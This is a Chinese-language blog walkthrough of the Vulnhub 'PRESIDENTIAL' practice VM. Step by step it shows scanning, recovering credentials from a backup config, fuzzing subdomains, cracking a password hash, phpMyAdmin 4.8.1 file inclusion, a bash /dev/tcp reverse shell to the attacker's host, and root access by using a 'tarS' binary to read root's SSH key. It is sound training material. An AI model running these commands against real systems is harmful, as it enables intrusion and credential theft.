Vulnhub靶机实战-PRESIDENTIAL

声明

好好学习,天天向上

搭建

vulnhub官网下载完镜像后,用vmware打开,遇到错误点击重试,即可,选择NAT后,直接就DHCP了

注意一点,vmware的兼容性,有问题,我用vmware,反弹shell和提权的时候,惨遭失败,一定要用oracle virtualbox,一定一定一定

vmware我用的桥接,virtualbox用的仅主机网卡#2,调了一下本机的网卡,调了半天,两边才能互相ping通

信我一句话,这非技术问题困了我好几天,弄不出来,vulnhub首页说建议用virtualbox,又说了vmware也行,我就一根筋用vmware,及结果近几天都无法攻陷,用virtualbox后,一晚上搞定,人家说啥就杀

最后面,附上我配置网络的各参数

渗透

美国国内的总统选举即将举行(2020年11月)。其中一个政党担心另一个政党将通过入侵登记系统和伪造选票来实施选举欺诈。

因此,安大略州要求您(一名独立的渗透测试人员)测试其服务器的安全性,以减轻任何选举舞弊问题。您的目标是查看您是否可以获得对服务器的root访问权限–该州仍在开发其注册网站,但已要求您在网站和注册系统启动之前测试其服务器安全性。

DHCP后是192.168.239.196

存活扫描,发现目标

arp-scan -l

端口扫描

nmap -T4 -A 192.168.239.196 -p 1-65535 -oN nmap.A

开启80和2082

ssh还不用默认端口,安全意识还可以

Vulnhub靶机实战-PRESIDENTIAL_第1张图片

访问80

http://192.168.239.196

扫描目录

python3 dirsearch.py -u "http://192.168.239.196" -e *

没扫到几个

Vulnhub靶机实战-PRESIDENTIAL_第2张图片

挨个看看,config应该最优先,但是都是空白,不过在bak源码中查到了数据库信息

view-source:http://192.168.239.196/config.php.bak

Vulnhub靶机实战-PRESIDENTIAL_第3张图片


发现了数据库的账号和密码等信息,但是服务器没有开启数据库端口,扫描目录也未发现登陆数据库的地方。这时候不难想到一个ip可能绑定多个域名,或许可以通过查找其子域名来发现突破点。

在网站首页发现,邮箱地址[email protected],该网站域名为votenow.local

为什么改域名?

这一点,很多网站的访问,都会限制,只允许通过域名的方式访问,并且很多情况下证书绑定的都是域名

将其添加到/etc/hosts中

vim /etc/hosts
192.168.239.196 votenow.local

Vulnhub靶机实战-PRESIDENTIAL_第4张图片

之后使用subrake或者wfuzz来进行子域名爆破,想用挖掘机的也可以试试

wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 votenow.local

爆破出来了一个

Vulnhub靶机实战-PRESIDENTIAL_第5张图片

192.168.239.196 datasafe.votenow.local

访问

datasafe.votenow.local

出现了phpmyadmin

用config.php.bak里的账号密码登入

Vulnhub靶机实战-PRESIDENTIAL_第6张图片

拿到admin的用户名和密码

admin
$2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i

Vulnhub靶机实战-PRESIDENTIAL_第7张图片

使用kali的john进行爆破,将密文保存到john.txt中执行

john john.txt

成功爆破出密码Stella

Vulnhub靶机实战-PRESIDENTIAL_第8张图片

ssh不过去

不过phpmyadmin漏洞也不少,4.8.1就有,参考

https://blog.csdn.net/zy15667076526/article/details/111824748

Vulnhub靶机实战-PRESIDENTIAL_第9张图片

SQL执行

select ''

Vulnhub靶机实战-PRESIDENTIAL_第10张图片

Vulnhub靶机实战-PRESIDENTIAL_第11张图片

首先按F12找到自己的session文件名

Vulnhub靶机实战-PRESIDENTIAL_第12张图片

拿到session

251au5g360gngvrs1953jdq10h1rqjfd

然后在index.php页面中进行包含

http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_g075j6sq81fudhokm81s27p9lc54t919

反弹shell

kali写入,并开启站点

bash -i >& /dev/tcp/192.168.239.5/6666 0>&1
python -m SimpleHTTPServer 80

phpmyadmin执行

select ''

http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_g075j6sq81fudhokm81s27p9lc54t919

反弹shell,并提权

cd ~
cat notes.txt
whereis tarS
ls -al /usr/bin/tarS

tarS -cvf key.tar /root/.ssh/id_rsa
tar -xvf key.tar
cd root/.ssh
ssh -i id_rsa root@localhost -p 2082

Vulnhub靶机实战-PRESIDENTIAL_第13张图片

Vulnhub靶机实战-PRESIDENTIAL_第14张图片

网络搭建参数

记录一下,因为我也调了好久,害怕后面记不住,先记录一下

本机四块网卡

两块vmware的

两块virtualbox的

在这里插入图片描述

vmware的两块

Vulnhub靶机实战-PRESIDENTIAL_第15张图片

Vulnhub靶机实战-PRESIDENTIAL_第16张图片

virtualbox的两块

Vulnhub靶机实战-PRESIDENTIAL_第17张图片

Vulnhub靶机实战-PRESIDENTIAL_第18张图片

vmware管理配置

Vulnhub靶机实战-PRESIDENTIAL_第19张图片

virtualbox管理配置

Vulnhub靶机实战-PRESIDENTIAL_第20张图片

Vulnhub靶机实战-PRESIDENTIAL_第21张图片

Vulnhub靶机实战-PRESIDENTIAL_第22张图片

Vulnhub靶机实战-PRESIDENTIAL_第23张图片

Vulnhub靶机实战-PRESIDENTIAL_第24张图片

vmware虚机配置

Vulnhub靶机实战-PRESIDENTIAL_第25张图片

virtualbox虚机配置

Vulnhub靶机实战-PRESIDENTIAL_第26张图片

总结

端口扫描

发现80和2082

web权限

80发现敏感信息,邮箱域名,爆破这个域名的子域名,添加解析,发现子域名,再次添加解析,可以解析到phpmyadmin的后台,扫描80的目录,可以发现敏感的配置文件,phpmyadmin的用户名和密码
登录phpmyadmin后,发现user,admin和加密的密码,爆破出admin密码

后台权限

利用phpmyadmin的文件包含,getshell

权限维持

getshell后,反弹shell,查看桌面目录后,拿到flag,发现提醒,使用压缩命令

提权

利用压缩命令进行提权,拿到flag

你可能感兴趣的:(靶场,渗透测试,靶机实战,vlnhub)